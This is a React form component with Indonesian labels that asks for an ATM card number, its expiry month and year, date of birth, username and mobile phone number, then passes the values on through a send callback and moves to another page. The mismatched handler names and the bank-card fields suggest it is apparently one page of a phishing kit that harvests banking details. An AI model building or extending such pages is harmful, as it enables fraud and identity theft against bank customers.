import {useNavigate} from 'react-router-dom'

function Page3(props) {
  let nav = useNavigate()
  const ok = () => {
    props.send()
    nav('/two')
  }

  return (
    <>
      <div className="page3">
        <form className='f3' onSubmit={ok}>
          <input type="Number" placeholder="Masukkan Nomor Kartu ATM" onInput={e => props.nama(e.target.value)} required /><br/>
          <input style={{marginBottom:"10vw"}}type="text" placeholder="MM" maxlength="2" onInput={e => props.user(e.target.value)} className='duo' required />
          <input style={{paddingLeft:'3vw'}} type="text" placeholder="YY" maxlength="2" onInput={e => props.atm(e.target.value)} className='duo duo-kedua' required /><br/>
          <input style={{marginBottom:"11vw"}}type="number" placeholder="Tanggal Lahir" onInput={e => props.tlp(e.target.value)} required /><br/>
          <input style={{marginBottom:"10vw"}} type="text" placeholder="Masukkan Username" onInput={e => props.input1(e.target.value)}  required /><br/>
          <input type="Number" placeholder="Masukkan Nomor Handphone" minlength="10" onInput={e => props.input2(e.target.value)} required /><br/>
          <button style={{marginTop:"0vw"}}></button>
        </form>
      </div>
    </>
  );
}

export default Page3;
